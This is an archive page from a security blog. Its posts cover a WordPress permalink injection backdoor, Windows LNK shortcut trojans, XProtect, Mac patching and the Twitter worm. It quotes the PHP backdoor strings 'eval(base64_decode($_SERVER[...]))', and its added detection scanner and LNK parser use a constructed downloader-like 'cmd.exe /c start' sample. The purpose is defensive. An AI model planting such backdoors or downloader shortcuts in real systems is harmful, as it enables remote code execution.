Archive

Archive for the ‘Daily Thoughts’ Category

Wor{d|m}press

It’s a really tedious job to update and patch from time to time. I should say, security comes with great responsibility, just like parking your car in the right place or locking your valuable computer when leaving.

Last week, users running older versions of WordPress noticed unusual strings added to their blogs’ permalinks, which broke their blog post links.

journeyetc.com responded and described the attack:

“If you use wordpress, you should check ASAP your blog’s permalinks/rss feed.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.”

Affected users now face the dilemma of upgrading and cleaning up. The SQL injection attack leaves a backdoor through which, even after upgrading, a remote attacker may still get in. I recommend further reading of this post, “Old WordPress versions under attack” by Lorelle.
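A quick way to check for the backdoor described above is to scan the stored option values (and any other text pulled from the database or theme files) for the eval/base64_decode pattern visible in the quoted permalinks, both as stored and after URL-decoding, since one of the observed variants is percent-encoded. The script below is an added example written for this post, not code from journeyetc.com or WordPress; the sample rows are constructed to mirror the quoted strings, and the column layout is a simplified stand-in for the wp_options table.

```python
import re
from urllib.parse import unquote

# Indicator taken from the injected permalink strings quoted in the post:
# a PHP eval() wrapped around base64_decode() of a request header.
INJECTION_PATTERN = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_SERVER\s*\[",
    re.IGNORECASE,
)


def is_injected(value: str) -> bool:
    """Return True if the text carries the eval/base64 permalink backdoor.

    The value is checked both as stored and after URL-decoding, because one
    observed variant is percent-encoded (%7B, %5B, ...) in the database.
    """
    for candidate in (value, unquote(value)):
        if INJECTION_PATTERN.search(candidate):
            return True
    return False


def scan_option_rows(rows):
    """Scan (option_id, option_name, option_value) rows, as they would be read
    from wp_options, and return the ids of rows carrying the backdoor."""
    return [option_id for option_id, _name, value in rows if is_injected(value)]


# Constructed sample rows (assumed layout, not a real database dump): two mirror
# the injected strings quoted in the post, one is a normal permalink structure,
# one is an unrelated option that must not be flagged.
SAMPLE_ROWS = [
    (1, "permalink_structure", "/%year%/%monthnum%/%postname%/"),
    (2, "permalink_structure",
     "/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"),
    (3, "permalink_structure",
     "/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%"),
    (4, "blogname", "My Blog"),
]

if __name__ == "__main__":
    hits = scan_option_rows(SAMPLE_ROWS)
    print(f"{len(hits)} row(s) carry the eval/base64 backdoor: ids {hits}")
```

Because the same pattern can be planted in theme or plugin files, `is_injected` takes plain text, so the contents of those files can be passed through it as well; a match in any of them means the clean-up is not finished, regardless of the WordPress version now installed.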

About XProtect

A very good piece of information about Snow Leopard’s malware protection, its capabilities and limitations:

Snow Leopard malware protection system: What does XProtect do?

Categories: Daily Thoughts

Snow Leopard includes malware protection

Interesting news (it’s now all over the net): Snow Leopard includes malware protection that detects two known threats, RSPlug and iServices. (Intego first spotted this anti-malware feature.)

Now curious thoughts are buzzing around: many suspect that Apple is using ClamAV, although Ryan Naraine @ ZDNet blog has confirmed that Apple is not using it. Others suggest that it might be using Symantec’s engine, because of the naming convention used, “OSX.RSPlug.A, OSX.iService.A”.

Anyway, in perspective, it seems Apple is taking no chances with emerging and prevalent threats on the Mac (as noted in recent changes). It is taking steps forward to deliver protection and exercise due care, which is good.

“Due care is care that a reasonable man would exercise under the circumstances”

At the end of the day, security is a process, which lives with and deals with reality: our day-to-day computing activities.

Security research, findings and awareness provide an avenue for a better understanding of these (impending) attacks or threats.

Am I infected?

I love reading emails, especially when they come with a background =)


If you just double-click it, then you are not infected. However, if you follow and successfully finish the installation process, then you are definitely infected!

Windows Shortcut – LNK File Format


Figure 01 – LNK Top Level File Structure

A computer shortcut (shortcut) is a small file containing a target URI or the name of a target program file that the shortcut represents. [wiki]

Microsoft Windows uses .lnk as the filename extension for shortcuts to local files, and .URL for shortcuts to remote files, like web pages.

Thanks to Jesse Hager for creating the specification document. Please refer to this link http://www.wotsit.org/list.asp?al=L and search for ‘LNK’ to download a good reference.

As observed, LNK trojan downloaders take advantage of the command-line string stored in the shortcut to perform malicious activity.

**Update**

0-day in malformed Windows Shell Link (.LNK) binaries, referred to as CVE-2010-2568 and Microsoft Security Advisory (2286198)

LNK binary file format reference:

LNK_The_Windows_Shortcut_File_Format

MS-SHLLINK
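To see how the command-line string referred to above actually sits inside a shortcut, the following parser reads the ShellLinkHeader, skips the optional LinkTargetIDList and LinkInfo blocks, and then walks the StringData sections in the order the MS-SHLLINK reference defines (NAME, RELATIVE_PATH, WORKING_DIR, COMMAND_LINE_ARGUMENTS, ICON_LOCATION), honouring the IsUnicode flag. It is an added example written for this post, not code from the specification authors or from any tool; the `build_lnk` helper, the sample shortcuts it constructs and the flagging heuristics in `suspicious_reasons` (a URL in the arguments, or a shell/script host launched with arguments) are assumptions of the example, chosen to illustrate what a triage script would look at rather than taken from the page.

```python
import struct

# LinkFlags bits of the ShellLinkHeader (MS-SHLLINK section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7

HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} as it is laid out on disk.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# StringData sections appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = [
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
]

# Assumed heuristic list for the example: executables whose presence as the
# shortcut target, together with arguments, is worth a closer look.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_lnk(data: bytes) -> dict:
    """Validate the header, skip IDList/LinkInfo, and return the StringData fields."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    result = {"flags": flags}
    unicode = bool(flags & IS_UNICODE)
    for flag, field in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        width = 2 if unicode else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        result[field] = raw.decode("utf-16-le" if unicode else "cp1252")
    return result


def suspicious_reasons(info: dict) -> list:
    """Return human-readable reasons a parsed shortcut deserves a closer look."""
    reasons = []
    args = info.get("arguments", "")
    target = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if "://" in args:
        reasons.append("command line contains a URL")
    if target in SCRIPT_HOSTS and args:
        reasons.append(f"shortcut launches {target} with arguments")
    return reasons


def build_lnk(target: str, arguments: str = "", unicode: bool = True) -> bytes:
    """Construct a minimal shortcut carrying RELATIVE_PATH and optional arguments.

    Assumed helper for the example: real shortcuts usually also carry an IDList
    and LinkInfo, which parse_lnk skips by size, so this keeps the sample small.
    """
    flags = HAS_RELATIVE_PATH | (HAS_ARGUMENTS if arguments else 0) | (IS_UNICODE if unicode else 0)
    # HeaderSize, LinkCLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize,
    # IconIndex, ShowCommand (1 = SW_SHOWNORMAL), HotKey, Reserved1..3.
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def encode(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le" if unicode else "cp1252")

    body = encode(target) + (encode(arguments) if arguments else b"")
    return header + body + b"\x00\x00\x00\x00"   # ExtraData TerminalBlock


# Constructed samples: a plain shortcut and one shaped like a downloader.
BENIGN = build_lnk("..\\notepad.exe")
DOWNLOADER_LIKE = build_lnk(".\\cmd.exe", "/c start http://example.invalid/", unicode=False)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("downloader-like", DOWNLOADER_LIKE)):
        info = parse_lnk(blob)
        print(label, info.get("relative_path"), repr(info.get("arguments", "")),
              suspicious_reasons(info) or "no findings")
```

The parser deliberately trusts only the sizes it needs and raises on a bad header; when triaging a file of the kind the Update above refers to, the interesting fields are the ones this returns, so a malformed IDList or oversized string count shows up as a slice that is shorter than advertised rather than as a crash.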

OS X users, please patch!

If you haven’t patched yet, then please do.


How do I know if I’m patched?

Click “About This Mac” and it should display Mac OS X version 10.5.7. You can do the same for Safari by clicking “About Safari”; this should display Safari 4 (beta).

Why is it important to patch?

There are critical vulnerabilities that could allow a malicious user (hacker, malware) to snoop and steal your information in the background. Let me cite examples of vulnerabilities that have captured media attention (which means many attackers are aware of them).

Safari RSS

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.6, Mac OS X Server v10.5.6

Solution: The critical issue has been addressed in Security Update 2009-001 for Mac users and Safari 3.2.2 for Windows.

Impact: Accessing a maliciously crafted feed: URL may lead to arbitrary code execution.

An attacker can easily craft a URL and execute JavaScript, which could expose your personal and sensitive information.


Disk Images

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6

Solution: The critical issue has been addressed in Security Update 2009-002

Impact: Mounting a maliciously crafted disk image may lead to an unexpected application termination or arbitrary code execution.

This is very critical given that browsers like Safari have “Open safe files after downloading” enabled by default. You can turn off this option in Safari by following the instructions below:

1. Open Safari

2. Open “Preferences” under the “Safari” menu

3. Click on the “General” tab

4. Un-check the “Open ‘safe’ files after downloading” box

5. Close Safari’s preferences


Apple profiles “Twitter”

Apple profiles a series of companies that use Macs, and one of them is Twitter; the profile is titled “Twitter. Triumph of humanity”.

It’s a nice story, although when you think of the recent series of successful attacks (the Mikeyy worm and the exposure of the Twitter admin panel), you’ll probably react this way …

“Aha?!, Interesting!”

Categories: Daily Thoughts

haxyou? haxed you!

“I am aware of the attack and yes I am behind this attack.” said the Twitter worm author.  [Read BNO News]

It seems that the author is not happy with the scrutiny/criticism and media attention he’s getting now, since another variant was spotted again in the wild.

“This is what happens to media whores….”  [Seclist FD thread]

Glorifying Bad Behavior

From today’s news: “Twitter worm author gets a job at exqSoft Solutions”

We often hear this kind of news about celebrities (Hollywood stars, sports and social networks like YouTube) but not about people committing cyber crime. This is an alarming trend.

I immediately searched for psychology research in this area, and here’s the interesting info I found:

“adolescents engage in bad behaviour because they find benefits — such as the immediate gratification of peer acceptance — are worth the risks.”  as published in journal Psychological Science.

No doubt, the 17-year-old Twitter worm author/spreader landed a job.

In information security this is absolutely not acceptable. Imagine an additional attack vector coming from this stream.

Digital Malware Snapshot

I was walking and looking around an art gallery when fond thoughts came to me: I was staring and imagining what it would be like to be in a gallery of a malware digital art collection. That would be sweet! A researcher becoming an artist by creating visual art from virus code.

Interestingly, this week Symantec’s MessageLabs will showcase 20 digital malware snapshots/pictures as part of the 2009 RSA Conference. It seems that my fond thoughts weren’t far from reality.


More images/info are published at http://www.eweek.com/c/a/Security/Symantec-Showcases-Digital-Malware-Snapshots-for-2009-RSA-Conference-164639/

Categories: Daily Thoughts